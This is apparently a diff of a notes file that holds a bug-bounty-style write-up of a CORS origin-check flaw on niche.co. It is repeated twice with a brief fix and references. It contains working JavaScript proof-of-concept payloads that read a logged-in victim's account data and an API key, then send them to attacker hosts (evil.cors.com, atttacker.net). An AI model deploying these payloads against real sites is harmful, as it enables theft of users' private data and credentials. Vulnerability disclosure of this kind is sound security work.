hackerhumble · September 7, 2019 17:45
diff --git a/cors.txt b/cors.txt
 Payload: Use this payload to send XHR request to the cross domain


 Description:

 Basically, the application was only checking whether "//niche.co" was in the Origin header, that means i can give anything containing that. For ex : "https://niche.co.evil.net", "https://niche.com", i can even change the protocol like http, ftp, file etc. cors_1.png (F363563): cors_1.png

 Steps To Reproduce:
 Exploit:
 Host this code on a domain(http://niche.co.evil.net) or any other that contains "//niche.co".

 <html>
 <body>
 <button type='button' onclick='cors()'>CORS</button>
 <p id='demo'></p>
 <script>
 function cors() {
 var xhttp = new XMLHttpRequest();
 xhttp.onreadystatechange = function() {
 if (this.readyState == 4 && this.status == 200) {
 var a = this.responseText; // Sensitive data from niche.co about user account
 document.getElementById("demo").innerHTML = a;
 xhttp.open("POST", "http://evil.cors.com", true);// Sending that data to Attacker's website
 xhttp.withCredentials = true;
 console.log(a);
 xhttp.send("data="+a);
 }
 };
 xhttp.open("GET", "https://www.niche.co/api/v1/users/*******", true);
 xhttp.withCredentials = true;
 xhttp.send();
 }
 </script>
 </body>
 </html>
 As soon as victim visit this malicious page, his details will be fetched from his current session and sent to attacker's domain where it can be logged or saved. cors_3.png (F363586): cors_3.png cors_2.png (F363564): cors_2.png

 How to fix
 Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

 Supporting Material/References:
 https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
 https://ejj.io/misconfigured-cors/

 =================================================================================================================================================================


 var req = new XMLHttpRequest(); 
 req.onload = reqListener; 
 req.open('get','https://btc-exchange/api/requestApiKey',true); 
 req.withCredentials = true;
 req.send();

 function reqListener() {
    location='//atttacker.net/log?key='+this.responseText; 
 };

 =================================================================================================================================================================
	Payload: Use this payload to send XHR request to the cross domain


	Description:

	Basically, the application was only checking whether "//niche.co" was in the Origin header, that means i can give anything containing that. For ex : "https://niche.co.evil.net", "https://niche.com", i can even change the protocol like http, ftp, file etc. cors_1.png (F363563): cors_1.png

	Steps To Reproduce:
	Exploit:
	Host this code on a domain(http://niche.co.evil.net) or any other that contains "//niche.co".

	<html>
	<body>
	<button type='button' onclick='cors()'>CORS</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from niche.co about user account
	document.getElementById("demo").innerHTML = a;
	xhttp.open("POST", "http://evil.cors.com", true);// Sending that data to Attacker's website
	xhttp.withCredentials = true;
	console.log(a);
	xhttp.send("data="+a);
	}
	};
	xhttp.open("GET", "https://www.niche.co/api/v1/users/*******", true);
	xhttp.withCredentials = true;
	xhttp.send();
	}
	</script>
	</body>
	</html>
	As soon as victim visit this malicious page, his details will be fetched from his current session and sent to attacker's domain where it can be logged or saved. cors_3.png (F363586): cors_3.png cors_2.png (F363564): cors_2.png

	How to fix
	Rather than using a wildcard or programmatically verifying supplied origins, use a whitelist of trusted domains.

	Supporting Material/References:
	https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties
	https://ejj.io/misconfigured-cors/

	=================================================================================================================================================================


	var req = new XMLHttpRequest();
	req.onload = reqListener;
	req.open('get','https://btc-exchange/api/requestApiKey',true);
	req.withCredentials = true;
	req.send();

	function reqListener() {
	location='//atttacker.net/log?key='+this.responseText;
	};

	=================================================================================================================================================================